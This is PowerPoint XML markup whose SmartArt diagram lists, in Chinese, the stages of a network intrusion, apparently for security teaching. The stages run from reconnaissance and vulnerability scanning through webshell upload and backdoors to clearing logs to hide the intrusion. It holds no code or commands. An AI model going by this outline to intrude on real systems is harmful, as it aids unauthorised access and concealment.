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3" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId78"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId79"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="260" r:id="rId3"/>
    <p:sldId id="1131" r:id="rId4"/>
    <p:sldId id="1158" r:id="rId5"/>
    <p:sldId id="1159" r:id="rId6"/>
    <p:sldId id="1168" r:id="rId7"/>
    <p:sldId id="1169" r:id="rId8"/>
    <p:sldId id="1257" r:id="rId9"/>
    <p:sldId id="1258" r:id="rId10"/>
    <p:sldId id="1260" r:id="rId11"/>
    <p:sldId id="1171" r:id="rId12"/>
    <p:sldId id="1174" r:id="rId13"/>
    <p:sldId id="1172" r:id="rId14"/>
    <p:sldId id="1178" r:id="rId15"/>
    <p:sldId id="1196" r:id="rId16"/>
    <p:sldId id="1013" r:id="rId17"/>
    <p:sldId id="1014" r:id="rId18"/>
    <p:sldId id="1134" r:id="rId19"/>
    <p:sldId id="1017" r:id="rId20"/>
    <p:sldId id="1018" r:id="rId21"/>
    <p:sldId id="1020" r:id="rId22"/>
    <p:sldId id="1197" r:id="rId23"/>
    <p:sldId id="1022" r:id="rId24"/>
    <p:sldId id="1141" r:id="rId25"/>
    <p:sldId id="1140" r:id="rId26"/>
    <p:sldId id="1032" r:id="rId27"/>
    <p:sldId id="1033" r:id="rId28"/>
    <p:sldId id="1034" r:id="rId29"/>
    <p:sldId id="1198" r:id="rId30"/>
    <p:sldId id="1189" r:id="rId31"/>
    <p:sldId id="1190" r:id="rId32"/>
    <p:sldId id="1191" r:id="rId33"/>
    <p:sldId id="1199" r:id="rId34"/>
    <p:sldId id="1193" r:id="rId35"/>
    <p:sldId id="1194" r:id="rId36"/>
    <p:sldId id="1200" r:id="rId37"/>
    <p:sldId id="1201" r:id="rId38"/>
    <p:sldId id="1204" r:id="rId39"/>
    <p:sldId id="1205" r:id="rId40"/>
    <p:sldId id="1206" r:id="rId41"/>
    <p:sldId id="1207" r:id="rId42"/>
    <p:sldId id="1210" r:id="rId43"/>
    <p:sldId id="1211" r:id="rId44"/>
    <p:sldId id="1212" r:id="rId45"/>
    <p:sldId id="1213" r:id="rId46"/>
    <p:sldId id="1214" r:id="rId47"/>
    <p:sldId id="1215" r:id="rId48"/>
    <p:sldId id="1220" r:id="rId49"/>
    <p:sldId id="1221" r:id="rId50"/>
    <p:sldId id="1224" r:id="rId51"/>
    <p:sldId id="1222" r:id="rId52"/>
    <p:sldId id="1225" r:id="rId53"/>
    <p:sldId id="1223" r:id="rId54"/>
    <p:sldId id="1226" r:id="rId55"/>
    <p:sldId id="1036" r:id="rId56"/>
    <p:sldId id="1037" r:id="rId57"/>
    <p:sldId id="1038" r:id="rId58"/>
    <p:sldId id="1039" r:id="rId59"/>
    <p:sldId id="1040" r:id="rId60"/>
    <p:sldId id="1070" r:id="rId61"/>
    <p:sldId id="1235" r:id="rId62"/>
    <p:sldId id="1146" r:id="rId63"/>
    <p:sldId id="1147" r:id="rId64"/>
    <p:sldId id="1148" r:id="rId65"/>
    <p:sldId id="1149" r:id="rId66"/>
    <p:sldId id="1185" r:id="rId67"/>
    <p:sldId id="1088" r:id="rId68"/>
    <p:sldId id="1090" r:id="rId69"/>
    <p:sldId id="1091" r:id="rId70"/>
    <p:sldId id="1092" r:id="rId71"/>
    <p:sldId id="1093" r:id="rId72"/>
    <p:sldId id="1181" r:id="rId73"/>
    <p:sldId id="1095" r:id="rId74"/>
    <p:sldId id="1096" r:id="rId75"/>
    <p:sldId id="1097" r:id="rId76"/>
    <p:sldId id="740" r:id="rId7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p:defaultTextStyle>
  <p:extLst>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2115">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="2899">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
      </p15:sldGuideLst>
    </p:ext>
    <p:ext uri="{2D200454-40CA-4A62-9FC3-DE9A4176ACB9}">
      <p15:notesGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="217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04AEDA"/>
    <a:srgbClr val="00BFFF"/>
    <a:srgbClr val="63B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2806" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="1128" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2115"/>
        <p:guide pos="2899"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="3024"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="50" d="100"/>
        <a:sy n="50" d="100"/>
      </p:scale>
      <p:origin x="0" y="3368"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="-3256" y="-96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide pos="217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5EC8A-56D6-4485-BEC9-22F6E74059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E54A1DE-7F67-4380-B9FA-0BBD582DC209}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="66A2DB"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>信息收集</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2691E70D-248B-43EB-A1B3-A63F074D6C09}" type="parTrans" cxnId="{B1EAF549-EF7C-4B00-B0B4-F01FDA12B3E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{253611D1-7910-4385-BDD3-2FF207B606FD}" type="sibTrans" cxnId="{B1EAF549-EF7C-4B00-B0B4-F01FDA12B3E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DA4B4C2-8957-46EB-9CA9-047B39869BBB}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>互联网收索，社会工程，</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>google hacking</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62794C94-20BF-48CC-99F4-BF2DA7F258F9}" type="parTrans" cxnId="{BAB1A984-4FA2-4198-9C98-9F918192407F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D447A6B-B3AD-4C01-AA0B-22E0F55563D2}" type="sibTrans" cxnId="{BAB1A984-4FA2-4198-9C98-9F918192407F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="66A2DB"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>漏洞扫描</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC72EDCA-4AFB-450B-934A-839713B115E2}" type="parTrans" cxnId="{CD5D6109-441A-461F-AF7A-D8E3FBDD37C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3139C94-A61F-437B-9071-16197C586360}" type="sibTrans" cxnId="{CD5D6109-441A-461F-AF7A-D8E3FBDD37C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9348B237-B599-4210-89B0-D8587F9F1F76}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>发现漏洞，组件漏洞，管理目录</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5D52DF4-FAB2-478A-B42D-4D82712EB570}" type="parTrans" cxnId="{EF17AA95-0DD9-4A25-AD72-02F93C748D8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A44AF9E9-31BE-4AB7-BD8B-96D5944B2F9D}" type="sibTrans" cxnId="{EF17AA95-0DD9-4A25-AD72-02F93C748D8D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3DCAFF0-1498-452A-A34C-3A65CC6764FA}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>服务器开发端口和应用服务，操作系统版本</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F50AF5DD-9031-4EC9-8C2E-C0A2D491EDC8}" type="parTrans" cxnId="{5AA5636F-7970-41D6-9AF4-773601A9F97D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD18DDD8-1C0E-4669-92F0-95147FBE96E7}" type="sibTrans" cxnId="{5AA5636F-7970-41D6-9AF4-773601A9F97D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F797C68-D2EC-497B-A04A-D6CD6DEB8163}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="66A2DB"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>获得权限</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59F0AF51-F673-4089-A89A-C72A83137052}" type="parTrans" cxnId="{F051EBF9-1BD7-40BE-915C-228ECAD98272}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C558FDA-5D7E-4324-9999-8B7104DB5422}" type="sibTrans" cxnId="{F051EBF9-1BD7-40BE-915C-228ECAD98272}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C2EF347-2F0F-40E2-911C-21976D00B369}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>上传一句话木马，</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
            <a:t>webshell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>，收集敏感信息</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{166C6E48-FE80-4F26-9B08-8D52C35F166B}" type="parTrans" cxnId="{2FD17AF4-98E6-48B7-B601-94EFBF6B2AC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74639954-E933-4B24-9290-02429E3924A8}" type="sibTrans" cxnId="{2FD17AF4-98E6-48B7-B601-94EFBF6B2AC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCA4C5C6-6D57-468E-98EA-66821820434A}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>开发语言，应用及操作系统版本指纹匹配</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28A57947-B12C-432C-9B3E-45B45C6ABC21}" type="parTrans" cxnId="{8EB553E8-05C6-4EE7-98FC-516A8DE23B46}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C37E6B18-1679-4AB4-9881-3A3AEEEAA5D3}" type="sibTrans" cxnId="{8EB553E8-05C6-4EE7-98FC-516A8DE23B46}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="66A2DB"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>保持连接</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{428C35CF-4CC8-46A4-AF72-86C1F3205A6A}" type="parTrans" cxnId="{A1465E10-46E8-446C-9367-D85043EA45FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0295E1A8-CA8B-477A-A2C6-4699A4B434A2}" type="sibTrans" cxnId="{A1465E10-46E8-446C-9367-D85043EA45FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{224E5D6F-C121-4245-B2A2-229D44F8A717}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>内网渗透</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBF6D387-1595-4652-9458-4C00812F98BA}" type="parTrans" cxnId="{17B4CFC8-BEC8-4B55-8FCA-A47C8575F361}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DACACBE-124B-4215-9E59-D90DC7EB243E}" type="sibTrans" cxnId="{17B4CFC8-BEC8-4B55-8FCA-A47C8575F361}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C82432DB-EAEB-4873-BB4C-BB4D6C1D5FC0}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>种下后门</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{16C1DCE8-0E42-4693-99D2-FBCCEBD970E2}" type="parTrans" cxnId="{388A3E6C-3486-49F3-9E54-AF8663A8252F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22CFEFEB-541D-4F39-B4FB-E5B0CDB9D9E6}" type="sibTrans" cxnId="{388A3E6C-3486-49F3-9E54-AF8663A8252F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6E3925C-7FA6-4D52-8998-932C4BB33225}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="66A2DB"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>清除痕迹</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCEB2159-41D3-4D73-A1DD-B8F70D3C825E}" type="parTrans" cxnId="{5E22266C-80F3-4928-9563-F44538101916}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57B6ECA9-CFCB-4A47-940A-5F3F0509D88C}" type="sibTrans" cxnId="{5E22266C-80F3-4928-9563-F44538101916}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35FD5845-E2AB-4A28-A1A6-BFD0B5B909B5}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>清除操作日志</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5386CA7-580A-43B4-AD53-06B1FD354528}" type="parTrans" cxnId="{EC7AA0C2-60DE-4BB0-84C3-ACCC57730657}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9173E3EE-79B2-434B-A620-B82148A392A8}" type="sibTrans" cxnId="{EC7AA0C2-60DE-4BB0-84C3-ACCC57730657}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{559CC706-9CF8-49E3-90FB-20FD5384C212}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>隐藏入侵的痕迹和并未今后可能访问留下控制权限</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{229C5E48-B1E0-4768-BF87-AF0050F7560B}" type="parTrans" cxnId="{44C29F29-A82C-49C9-8C63-2CC55EF24467}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C58EBD41-2F4D-481A-B97D-2EF18AA592A7}" type="sibTrans" cxnId="{44C29F29-A82C-49C9-8C63-2CC55EF24467}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" type="pres">
      <dgm:prSet presAssocID="{DAE5EC8A-56D6-4485-BEC9-22F6E7405978}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77CFC7BC-C923-4A17-8B09-7A63D5E81E86}" type="pres">
      <dgm:prSet presAssocID="{EE54A1DE-7F67-4380-B9FA-0BBD582DC209}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80D711F6-29FE-416C-BF75-961EEFBD7986}" type="pres">
      <dgm:prSet presAssocID="{EE54A1DE-7F67-4380-B9FA-0BBD582DC209}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="5" custLinFactNeighborX="-4786" custLinFactNeighborY="5335">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB776BE5-5451-43C2-8580-BADBB272BA26}" type="pres">
      <dgm:prSet presAssocID="{EE54A1DE-7F67-4380-B9FA-0BBD582DC209}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{610A138A-8A98-4551-8AB1-8B2AAB1352D9}" type="pres">
      <dgm:prSet presAssocID="{253611D1-7910-4385-BDD3-2FF207B606FD}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B040756-3D57-4056-8F47-4F04D38ABA9F}" type="pres">
      <dgm:prSet presAssocID="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
